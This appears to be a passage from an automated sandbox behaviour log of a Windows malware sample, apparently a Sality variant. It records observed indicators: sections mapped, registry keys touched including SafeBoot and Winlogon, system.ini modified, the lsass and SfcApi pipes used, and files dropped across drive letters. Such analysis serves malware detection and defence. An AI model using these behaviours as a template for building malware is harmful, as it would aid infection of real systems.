1650 \KnownDlls\UxTheme.dll map write and map read and map execute not known not known not known own pid object name not found 1
4 \NLS\NlsSectionCType map read 00500000 0 20C2 own pid success or wait 1
[[ Sections Created ]]
Reputation File Path Access Attributes Base Entrypoint Size Protection Mapped to pid Completion Count
626 not known query and map write and map read and map execute and extend size reserve not known 7F300 10000 read write own pid success or wait 1
4804 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll query and map write and map read and map execute image 773D0000 773D4256 103000 execute own pid success or wait 1
475 C:\WINDOWS\system32\winspool.drv query and map write and map read and map execute image 73000000 730054A5 26000 execute own pid success or wait 1
1108 C:\WINDOWS\system32\shimeng.dll query and map write and map read and map execute image 5CB70000 5CB78E55 26000 execute own pid success or wait 1
3 C:\WINDOWS\AppPatch\sysmain.sdb map read commit 003B0000 7F600 125ED2 readonly own pid success or wait 1
3 C:\WINDOWS\AppPatch\acgenral.dll map write and map read and map execute commit 004F0000 7ED00 1C4600 execute own pid success or wait 1
3 C:\WINDOWS\AppPatch\acgenral.dll map write and map read and map execute commit 004F0000 7E800 1C4600 execute own pid success or wait 1
1103 C:\WINDOWS\AppPatch\acgenral.dll query and map write and map read and map execute image 6F880000 6F8A606E 1CA000 execute own pid success or wait 1
2435 C:\WINDOWS\system32\winmm.dll query and map write and map read and map execute image 76B40000 76B42B61 2D000 execute own pid success or wait 1
1134 C:\WINDOWS\system32\msacm32.dll query and map write and map read and map execute image 77BE0000 77BE1292 15000 execute own pid success or wait 1
1848 C:\WINDOWS\system32\uxtheme.dll query and map write and map read and map execute image 5AD70000 5AD71626 38000 execute own pid success or wait 1
3 C:\WINDOWS\system32\imm32.dll map write and map read and map execute commit 00480000 7EA00 1AE00 execute own pid success or wait 1
3 C:\WINDOWS\system32\imm32.dll map write and map read and map execute commit 00480000 7E900 1AE00 execute own pid success or wait 1
5828 C:\WINDOWS\system32\imm32.dll query and map write and map read and map execute image 76390000 763912C0 1D000 execute own pid success or wait 1
3 C:\WINDOWS\WindowsShell.Manifest map write and map read and map execute commit 004A0000 7F000 2ED execute own pid success or wait 1
3 C:\WINDOWS\WindowsShell.Manifest query and map read commit 004A0000 7F100 2ED readonly own pid success or wait 1
3 C:\WINDOWS\WindowsShell.Manifest map read commit 004A0000 7F000 2ED readonly own pid success or wait 1
140 C:\WINDOWS\system32\shell32.dll map read commit 01020000 7EE00 811C00 readonly own pid success or wait 1
[[ Registry Keys Read ]]
Due to space I'll not list those
[[ Registry Keys created ]]
Reputation Key Path Access Options Completion Count
1133 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Multimedia\Audio query value and set value and create sub key and read or execute and write and read control non volatile success or wait 1
2243 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Multimedia\Audio Compression Manager\ set value and create sub key and read or execute and write and read control non volatile success or wait 2
1120 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Multimedia\Audio Compression Manager\MSACM query value and set value and create sub key and enumerate sub key and notify and read or execute and write and read control non volatile success or wait 1
1121 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Multimedia\Audio Compression Manager\Priority v4.00 query value and set value and create sub key and enumerate sub key and notify and read or execute and write and read control non volatile success or wait 1
[[ Mutex Created ]]
Reputation Name Completion Count
1146 \BaseNamedObjects\SHIMLIB_LOG_MUTEX object name exists 1
###################
# Runtime Analysis
###################
Here the runtime observations in regards of files and registry activities
[ Created Files ]
C:\40ca27
[ Files changed/Written ]
C:\WINDOWS\system.ini
\Device\NamedPipe\lsass
\Device\NamedPipe\SfcApi
[ Files Overwritten /CreateFileA]
Reputation File Path Access Options Completion Count
5548 WMIDataDevice read attributes and synchronize and generic read and generic write non directory file success or wait 1
5548 WMIDataDevice read attributes and synchronize and generic read and generic write non directory file success or wait 1
3157 \Device\Afd\Endpoint synchronize and generic read and generic write no options success or wait 1
4718 \Device\NamedPipe\ShimViewer write data or add file and append data or add subdirectory or create pipe instance and write ea and write attributes and read control and synchronize no options object name not found 1
5487 \Device\KsecDD read data or list directory and synchronize synchronous io alert success or wait 1
2650 C:\WINDOWS\system32\urlmon.dll.123.Manifest read data or list directory and read ea and execute or traverse and read attributes and read control and synchronize synchronous io non alert and non directory file object name not found 1
1522 C:\WINDOWS\system32\WININET.dll.123.Manifest read data or list directory and read ea and execute or traverse and read attributes and read control and synchronize synchronous io non alert and non directory file object name not found 1
3280 C:\WINDOWS\system32\SHELL32.dll.124.Manifest read data or list directory and read ea and execute or traverse and read attributes and read control and synchronize synchronous io non alert and non directory file object name not found 1
2875 C:\WINDOWS\system32\comctl32.dll.124.Manifest read data or list directory and read ea and execute or traverse and read attributes and read control and synchronize synchronous io non alert and non directory file object name not found 1
[ Other File Access ]
Reputation File Path Disposition Data Completion Count
0 D:\40cf29 overwrite if exists none no media in device 1
0 E:\40d362 overwrite if exists none object path not found 1
0 E:\40d814 overwrite if exists none object path not found 1
0 G:\40dcd0 overwrite if exists none object path not found 1
0 H:\40e13c overwrite if exists none object path not found 1
0 H:\40e52f overwrite if exists none object path not found 1
0 I:\40e991 overwrite if exists none object path not found 1
0 K:\40edfc overwrite if exists none object path not found 1
0 L:\40f236 overwrite if exists none object path not found 1
0 L:\40f63d overwrite if exists none object path not found 1
0 N:\40fa4f overwrite if exists none object path not found 1
2371 C:\WINDOWS\AppPatch\systest.sdb open none object name not found 1
0 O:\40fe9c overwrite if exists none object path not found 1
0 P:\4102ae overwrite if exists none object path not found 1
760 C:\WINDOWS\system32\urlmon.dll.123.Config open none object name not found 1
4993 C:\WINDOWS\WindowsShell.Config open none object name not found 1
454 C:\WINDOWS\system32\WININET.dll.123.Config open none object name not found 1
1135 C:\WINDOWS\system32\SHELL32.dll.124.Config open none object name not found 1
536 C:\WINDOWS\system32\comctl32.dll.124.Config open none object name not found 1
6 C:\WINDOWS\system32\NOTEPAD.EXE.Manifest open none object name not found 1
6 C:\WINDOWS\system32\NOTEPAD.EXE.Config open none object name not found 1
6 C:\WINDOWS\system.ini EndOfFileInformation 0C 01 00 00 00 00 00 00 success or wait 1
10566 \Device\NamedPipe\lsass PipeInformation 01 00 00 00 00 00 00 00 success or wait 31
157 \Device\NamedPipe\lsass CompletionInformation 24 01 00 00 00 00 FF FF success or wait 31
0 C:\40ca27 DispositionInformation 01 success or wait 1
28 \Device\NamedPipe\SfcApi PipeInformation 01 00 00 00 00 00 00 00 success or wait 1
3 \Device\NamedPipe\SfcApi CompletionInformation 24 01 00 00 00 00 FF FF success or wait 1
9 C:\WINDOWS\system32\VBoxTray.exe BasicInformation 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 A0 00 00 00 00 00 00 00 success or wait 1
[ Sections Opened ]
Reputation File Path Access Base Entrypoint Size Mapped to pid Completion Count
6053 \KnownDlls\kernel32.dll map write and map read and map execute 7C800000 7C80B64E F6000 own pid success or wait 1
1851 \NLS\NlsSectionUnicode map read 00270000 0 15DF4 own pid success or wait 1
1853 \NLS\NlsSectionLocale map read 00290000 0 40EDC own pid success or wait 1
1854 \NLS\NlsSectionSortkey query and map read 002E0000 0 40004 own pid success or wait 1
1854 \NLS\NlsSectionSortTbls map read 00330000 0 5A04 own pid success or wait 1
12353 \NLS\NlsSectionSortkey00000409 map read not known not known not known own pid object name not found 2
5198 \KnownDlls\ADVAPI32.dll map write and map read and map execute 77DD0000 77DD710B 9B000 own pid success or wait 1
6093 \KnownDlls\RPCRT4.dll map write and map read and map execute 77E70000 77E7628F 92000 own pid success or wait 1
6092 \KnownDlls\Secur32.dll map write and map read and map execute 77FE0000 77FE2146 11000 own pid success or wait 1
3952 \KnownDlls\GDI32.dll map write and map read and map execute 77F10000 77F16587 49000 own pid success or wait 1
5002 \KnownDlls\USER32.dll map write and map read and map execute 7E410000 7E41B217 91000 own pid success or wait 1
1579 \KnownDlls\WININET.dll map write and map read and map execute 3D930000 3D931744 E6000 own pid success or wait 1
5409 \KnownDlls\msvcrt.dll map write and map read and map execute 77C10000 77C1F2A1 58000 own pid success or wait 1
5016 \KnownDlls\SHLWAPI.dll map write and map read and map execute 77F60000 77F651FB 76000 own pid success or wait 1
385 \KnownDlls\Normaliz.dll map write and map read and map execute 00340000 401782 9000 own pid success or wait 1
2587 \KnownDlls\urlmon.dll map write and map read and map execute 78130000 78131AFA 132000 own pid success or wait 1
5157 \KnownDlls\ole32.dll map write and map read and map execute 774E0000 774FD0B9 13D000 own pid success or wait 1
4270 \KnownDlls\OLEAUT32.dll map write and map read and map execute 77120000 77121560 8B000 own pid success or wait 1
3270 \KnownDlls\iertutil.dll map write and map read and map execute 3DFD0000 3E0E7B59 1E8000 own pid success or wait 1
3369 \KnownDlls\SHELL32.dll map write and map read and map execute 7C9C0000 7C9E74E6 817000 own pid success or wait 1
357 \NLS\NlsSectionCType map read 00380000 0 20C2 own pid success or wait 1
2974 \KnownDlls\comctl32.dll map write and map read and map execute 5D090000 5D0934BA 9A000 own pid success or wait 1
1633 \KnownDlls\WS2_32.dll map write and map read and map execute not known not known not known own pid object name not found 1
2259 \KnownDlls\WS2HELP.dll map write and map read and map execute not known not known not known own pid object name not found 1
287 \KnownDlls\MPR.dll map write and map read and map execute 71B20000 71B2124A 12000 own pid success or wait 1
4 \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-220523388-1935655697-1343024091-1003SFM.DefaultS-1-5-21-220523388-1935655697-1343024091-1003 query and map write and map read and map execute and extend size 01C90000 0 40000 own pid success or wait 1
930 \KnownDlls\hnetcfg.dll map write and map read and map execute not known not known not known own pid object name not found 1
15 \KnownDlls\sfc.dll map write and map read and map execute not known not known not known own pid object name not found 1
39 \KnownDlls\sfc_os.dll map write and map read and map execute not known not known not known own pid object name not found 1
163 \KnownDlls\WINTRUST.dll map write and map read and map execute not known not known not known own pid object name not found 1
769 \KnownDlls\CRYPT32.dll map write and map read and map execute not known not known not known own pid object name not found 1
1006 \KnownDlls\MSASN1.dll map write and map read and map execute not known not known not known own pid object name not found 1
537 \KnownDlls\IMAGEHLP.dll map write and map read and map execute 76C90000 76C9126D 28000 own pid success or wait 1
1 \BaseNamedObjects\ShimSharedMemory map write 02E40000 0 E000 own pid success or wait 1
3213 \KnownDlls\VERSION.dll map write and map read and map execute 77C00000 77C01135 8000 own pid success or wait 1
[ Sections Created ]
Reputation File Path Access Attributes Base Entrypoint Size Protection Mapped to pid Completion Count
3286 not known query and map write and map read and map execute and extend size reserve not known 12F300 10000 read write own pid success or wait 1
490 C:\WINDOWS\system32\imm32.dll map write and map read and map execute commit 00350000 12EA00 1AE00 execute own pid success or wait 1
4 C:\WINDOWS\system32\imm32.dll map write and map read and map execute commit 00350000 F700DA00 1AE00 execute own pid success or wait 1
5828 C:\WINDOWS\system32\imm32.dll query and map write and map read and map execute image 76390000 763912C0 1D000 execute own pid success or wait 1
11 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll map write and map read and map execute commit 00930000 12EE00 101600 execute own pid success or wait 1
4804 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll query and map write and map read and map execute image 773D0000 773D4256 103000 execute own pid success or wait 1
307 C:\WINDOWS\WindowsShell.Manifest map write and map read and map execute commit 003A0000 12E600 2ED execute own pid success or wait 1
306 C:\WINDOWS\WindowsShell.Manifest query and map read commit 003A0000 12E700 2ED readonly own pid success or wait 1
292 C:\WINDOWS\WindowsShell.Manifest map read commit 003A0000 12E600 2ED readonly own pid success or wait 1
4 C:\WINDOWS\system32\shell32.dll map read commit 00B30000 0 811C00 readonly own pid success or wait 1
4 C:\WINDOWS\system32\comctl32.dll map read commit 00B30000 12E700 96C00 readonly own pid success or wait 1
8 \BaseNamedObjects\l8geqpHJTkdns0 query and map write and map read commit not known 0 8000 read write own pid success or wait 1
4 \BaseNamedObjects\KhguTew5 query and map write and map read commit 00B30000 0 11000 read write own pid success or wait 1
2210 C:\WINDOWS\system32\ws2_32.dll query and map write and map read and map execute image 71AB0000 71AB1273 17000 execute own pid success or wait 1
2199 C:\WINDOWS\system32\ws2help.dll query and map write and map read and map execute image 71AA0000 71AA1638 8000 execute own pid success or wait 1
4 C:\WINDOWS\system32\rpcss.dll map write and map read and map execute commit 01C80000 12E400 62000 execute own pid success or wait 1
4 C:\WINDOWS\system32\msctf.dll map write and map read and map execute commit 01C80000 12DD00 48C00 execute own pid success or wait 1
3030 C:\WINDOWS\system32\msctf.dll query and map write and map read and map execute image 74720000 747213A5 4C000 execute own pid success or wait 1
4 \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-220523388-1935655697-1343024091-1003 query and map write and map read commit 01C80000 0 1000 read write own pid object name exists 1
10 \BaseNamedObjects\KhguTew5 query and map write and map read commit 01CD0000 0 11000 read write own pid object name exists 2
5 \BaseNamedObjects\l8geqpHJTkdns0 query and map write and map read commit 022E0000 0 8000 read write own pid object name exists 4
2 not known query and map write and map read commit 022F0000 1DCFC00 3000 read write own pid success or wait 2
4 C:\WINDOWS\system32\mswsock.dll map write and map read and map execute commit 02820000 271E200 3BE00 execute own pid success or wait 1
1150 C:\WINDOWS\system32\mswsock.dll query and map write and map read and map execute image 71A50000 71A514CD 3F000 execute own pid success or wait 1
951 C:\WINDOWS\system32\hnetcfg.dll query and map write and map read and map execute image 662B0000 662E7A5B 58000 execute own pid success or wait 1
4 C:\WINDOWS\system32\wshtcpip.dll map write and map read and map execute commit 02830000 271E400 4C00 execute own pid success or wait 1
931 C:\WINDOWS\system32\wshtcpip.dll query and map write and map read and map execute image 71A90000 71A9142E 8000 execute own pid success or wait 1
21 C:\WINDOWS\system32\sfc.dll query and map write and map read and map execute image 76BB0000 76BB1233 5000 execute own pid success or wait 1
40 C:\WINDOWS\system32\sfc_os.dll query and map write and map read and map execute image 76C60000 76C6F03A 2A000 execute own pid success or wait 1
140 C:\WINDOWS\system32\wintrust.dll query and map write and map read and map execute image 76C30000 76C31529 2E000 execute own pid success or wait 1
955 C:\WINDOWS\system32\crypt32.dll query and map write and map read and map execute image 77A80000 77A81632 95000 execute own pid success or wait 1
954 C:\WINDOWS\system32\msasn1.dll query and map write and map read and map execute image 77B20000 77B233A1 12000 execute own pid success or wait 1
0 C:\WINDOWS\system32\VBoxTray.exe query and map write and map read commit 02D30000 0 10CA10 read write own pid success or wait 1
11 C:\WINDOWS\system32\notepad.exe query and map write and map read and map execute and extend size image not known 100739D 14000 execute own pid success or wait 1
1 C:\WINDOWS\system32\apphelp.dll map write and map read and map execute commit 02E50000 2A24E00 1EC00 execute own pid success or wait 1
937 C:\WINDOWS\system32\apphelp.dll query and map write and map read and map execute image 77B40000 77B41C09 22000 execute own pid success or wait 1
0 C:\WINDOWS\AppPatch\sysmain.sdb map read commit 02E50000 2A24E00 125ED2 readonly own pid success or wait 1
0 C:\WINDOWS\system32\notepad.exe map write and map read and map execute commit 02F80000 2A24600 10E00 execute own pid success or wait 2
0 C:\WINDOWS\system32\notepad.exe query and map read commit 02F80000 2A24700 10E00 readonly own pid success or wait 2
0 C:\WINDOWS\system32\notepad.exe query and map read commit 02E50000 2A25400 10E00 readonly own pid success or wait 1
[ Registry Keys Opened ]
Reputation Key Path Access Completion Count
8 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jusched.win32_sality_NAO.exe generic read object name not found 2
17524 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
5877 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Secur32.dll generic read object name not found 1
5876 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RPCRT4.dll generic read object name not found 1
5008 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ADVAPI32.dll generic read object name not found 1
9391 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
14917 HKEY_LOCAL_MACHINE maximum allowed success or wait 1
9391 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
4817 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USER32.dll generic read object name not found 1
13279 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager query value and read or execute success or wait 1
15048 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option query value and set value and read or execute and write object name not found 3
18639 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers query value and read or execute success or wait 5
5817 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers query value and read or execute object name not found 1
5801 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMM32.DLL generic read object name not found 1
5903 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntdll.dll generic read object name not found 1
5767 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kernel32.dll generic read object name not found 1
5730 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDI32.dll generic read object name not found 1
5214 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msvcrt.dll generic read object name not found 1
4840 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SHLWAPI.dll generic read object name not found 1
2499 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Normaliz.dll generic read object name not found 1
5144 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ole32.dll generic read object name not found 1
4109 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OLEAUT32.dll generic read object name not found 1
3160 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iertutil.dll generic read object name not found 1
2608 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\urlmon.dll generic read object name not found 1
1503 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WININET.dll generic read object name not found 1
3250 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SHELL32.dll generic read object name not found 1
11005 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Error Message Instrument\ query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
14378 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
8913 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
5062 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Performance maximum allowed object name not found 1
8154 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
6416 HKEY_LOCAL_MACHINE\Software\Microsoft\Ole query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
8064 HKEY_LOCAL_MACHINE\Software\Classes\Interface query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
8094 HKEY_LOCAL_MACHINE\Software\Classes\Interface\{00020400-0000-0000-C000-000000000046} query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
15730 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT query value and read or execute object name not found 2
7794 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT\UserEra query value and enumerate sub key and read or execute object name not found 1
28002 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots enumerate sub key and read or execute object name not found 3
7169 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\comctl32.dll generic read object name not found 2
16564 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003 query value and enumerate sub key and notify and read or execute and write and read control success or wait 3
8000 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Control Panel\Desktop query value and enumerate sub key and notify and read or execute and write and read control success or wait 2
4669 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\software\Microsoft\Windows\CurrentVersion\Explorer\Advanced query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
4787 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\LanguagePack query value and read or execute success or wait 1
4782 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003_Classes maximum allowed success or wait 1
2544 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003_CLASSES\PROTOCOLS\Name-Space Handler\ maximum allowed object name not found 1
590 HKEY_LOCAL_MACHINE\Software\Classes\PROTOCOLS\Name-Space Handler maximum allowed success or wait 1
2537 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003_Classes\PROTOCOLS\Name-Space Handler maximum allowed object name not found 1
8219 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003 maximum allowed success or wait 1
8683 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings query value and read or execute object name not found 2
4107 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings query value and read or execute success or wait 1
1454 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings query value and read or execute object name not found 2
5070 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN query value and enumerate sub key and notify and read or execute and write and read control object name not found 2
4101 HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2812 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ query value and read or execute object name not found 1
5808 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl query value and read or execute object name not found 1
3665 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl query value and read or execute object name not found 1
27532 HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl query value and read or execute success or wait 1
3655 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Internet Explorer\Main\FeatureControl query value and read or execute object name not found 1
2705 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915 query value and read or execute object name not found 1
8208 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ query value and enumerate sub key and notify and read or execute and write and read control object name not found 2
2538 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
8204 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ query value and enumerate sub key and notify and read or execute and write and read control object name not found 2
2539 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
5072 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK query value and enumerate sub key and notify and read or execute and write and read control object name not found 2
5406 HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK query value and enumerate sub key and notify and read or execute and write and read control object name not found 2
4974 HKEY_LOCAL_MACHINE\SYSTEM\Setup query value and read or execute success or wait 1
2189 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WS2HELP.dll generic read object name not found 1
1571 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WS2_32.dll generic read object name not found 1
2430 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters maximum allowed success or wait 1
2084 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9 maximum allowed success or wait 1
1518 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\00000006 maximum allowed object name not found 1
2084 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries maximum allowed success or wait 1
2081 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2079 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2082 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2082 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2083 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2078 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2078 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2078 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2079 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2079 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2080 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2079 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2076 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2042 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5 maximum allowed success or wait 1
1491 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\00000004 maximum allowed object name not found 1
2043 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries maximum allowed success or wait 1
2040 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2037 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2034 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1981 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters query value and read or execute success or wait 1
